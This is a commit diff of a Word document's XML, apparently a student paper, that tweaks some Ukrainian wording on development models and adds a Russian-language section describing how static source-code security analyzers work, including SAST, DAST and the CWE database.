<commit_message>
the beginning of ch 2
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -633,7 +633,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -2884,7 +2883,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ітектурою</w:t>
+        <w:t>ітектур</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -6572,7 +6579,26 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">V-образна модель </w:t>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9221,18 +9247,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>приймальні вип</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>робування (на рис. Не показані) - дозволяє користувачеві протестувати функціональні можливості системи на відповідність вихідним вимогам. Після остаточного тестування ПО і довколишній апаратне забезпечення стають робочими. Після цього забезпечується супровід системи.</w:t>
+        <w:t>приймальні випробування (на рис. Не показані) - дозволяє користувачеві протестувати функціональні можливості системи на відповідність вихідним вимогам. Після остаточного тестування ПО і довколишній апаратне забезпечення стають робочими. Після цього забезпечується супровід системи.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12068,6 +12083,7 @@
         <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12076,6 +12092,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12086,6 +12103,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12096,6 +12114,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -14171,18 +14190,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> до </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>частоті</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> до частот</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19825,15 +19843,561 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Классификация анализаторов исходного кода</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Анализаторы исходного кода — класс программных продуктов, созданных для выявления и предотвращения эксплуатации программных ошибок в исходных кодах. Все продукты, направленные на анализ исходного кода, можно условно разделить на три типа: Первая группа включает в себя анализаторы кода веб-приложений и средства по предотвращению эксплуатац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ии уя</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">звимостей веб-сайтов. Вторая группа — анализаторы встраиваемого кода, позволяющие обнаружить проблемные места в исходных текстах модулей, предназначенных для расширения функциональности корпоративных и производственных систем. К таким модулям относятся программы для линейки продуктов 1С, расширения CRM-систем, систем управления предприятием и систем SAP. Последняя группа предназначена для анализа исходного кода на различных языках программирования, не относящихся к бизнес-приложениям и веб-приложениям. Такие анализаторы предназначены для заказчиков и разработчиков программного обеспечения. В том числе данная группа анализаторов применяется для использования методологии защищенной разработки программных продуктов. Анализаторы статического кода находят проблемы и потенциально уязвимые места в исходных кодах и выдают рекомендации для их устранения. Стоит отметить, что большинство из анализаторов относятся к смешанным типам и выполняют функции по анализу широкого спектра программных продуктов — веб-приложений, встраиваемого кода и обычного программного обеспечения. Тем не </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>менее</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в данном обзоре упор сделан на применение анализаторов заказчиками разработки, поэтому большее внимание уделяется анализаторам веб-приложений и встраиваемого кода. Анализаторы могут содержать различные механизмы анализа, но наиболее распространенным и универсальным является статический анализ исходного кода — SAST (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Static</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Testing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>), также существуют методы динамического анализа — DAST (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Dynamic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Testing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">выполняющие проверки кода при его исполнении, и различные гибридные варианты, совмещающие разные типы анализов. Динамический анализ является самостоятельным методом проверки, который может расширять возможности статического анализа или применяться самостоятельно в тех случаях, когда доступ к исходным текстам отсутствует. В данном обзоре рассматриваются только статические анализаторы. Анализаторы встраиваемого кода и веб-приложений различаются по набору характеристик. В него входят не только качество анализа и перечень поддерживаемых программных продуктов и языков программирования, но и дополнительные механизмы: возможность осуществления автоматического исправления ошибок, наличие функций по предотвращению эксплуатации ошибок без изменений кода, возможность обновления встроенной базы уязвимостей и ошибок программирования, наличие сертификатов соответствия и возможность выполнения требований различных регуляторов.   Принципы работы анализаторов исходного кода Общие принципы работы схожи для всех классов анализаторов: и анализаторов исходного кода веб-приложений, и анализаторов встраиваемого кода. Отличие между этими типами продуктов — только в возможности определить особенности выполнения и взаимодействия кода с внешним миром, что отражается в базах уязвимостей анализаторов. Большая часть анализаторов, представленных на рынке, выполняет функции обоих классов, одинаково хорошо проверяя как встраиваемый в бизнес-приложения код, так и код веб-приложений. Входными данными для анализатора исходного кода является массив исходных текстов программ и его зависимостей (подгружаемых модулей, используемого стороннего программного обеспечения и т. д.). В качестве результатов работы все анализаторы выдают отчет об обнаруженных уязвимостях и ошибках программирования, дополнительно некоторые анализаторы предоставляют функции по автоматическому исправлению ошибок. Стоит отметить, что автоматическое исправление ошибок не </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>всегда работает корректно, поэтому данный функционал предназначен только для разработчиков веб-приложений и встраиваемых модулей, заказчик продукта должен опираться только на финальный отчет анализатора и использовать полученные данные для принятия решения по приемке и внедрению разработанного кода или отправки его на доработку.   Рисунок 1. Алгоритм работы анализатора исходных кодов</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ри проведении оценки исходных текстов анализаторы используют различные базы данных, содержащие описание уязвимостей и ошибок программирования: Собственная база уязвимостей и ошибок программирования — у каждого разработчика анализаторов исходных кодов есть свои отделы аналитики и исследований, которые готовят специализированные базы для анализа исходных текстов программ. Качество собственной базы — один из ключевых критериев, влияющий на общее качество работы продукта. Кроме того, собственная база должна быть динамической и постоянно обновляемой — новые векторы атак и эксплуатац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ии уя</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">звимостей, а также изменения в языках программирования и методах разработки требуют от разработчиков анализаторов выполнять постоянные обновления базы для сохранения высокого качества проверки. Продукты со статической </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>необновляемой</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> базой чаще всего проигрывают в сравнительных тестах. Государственные базы ошибок программирования — существует ряд государственных баз уязвимостей, составлением и поддержкой которых занимаются регуляторы разных стран. К примеру, в США используется база CWE — </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Common</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Weakness</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Enumeration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, обслуживанием которой занимается организация MITRE, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>поддерживаемая</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в том числе Министерством обороны США. В России пока отсутствует аналогичная база, но ФСТЭК России в будущем планирует дополнить свои базы уязвимостей и угроз базой по ошибкам программирования. Анализаторы уязвимостей реализуют поддержку базы CWE, встраивая ее в собственную базу уязвимостей или используя как отдельный механизм проверки. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Требования стандартов и рекомендации по защищенному программированию — существует как ряд государственных и отраслевых стандартов, описывающих требования к безопасной разработке </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>приложений</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, так и ряд рекомендаций и «лучших практик» от мировых экспертов в области разработки и защиты программного обеспечения. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
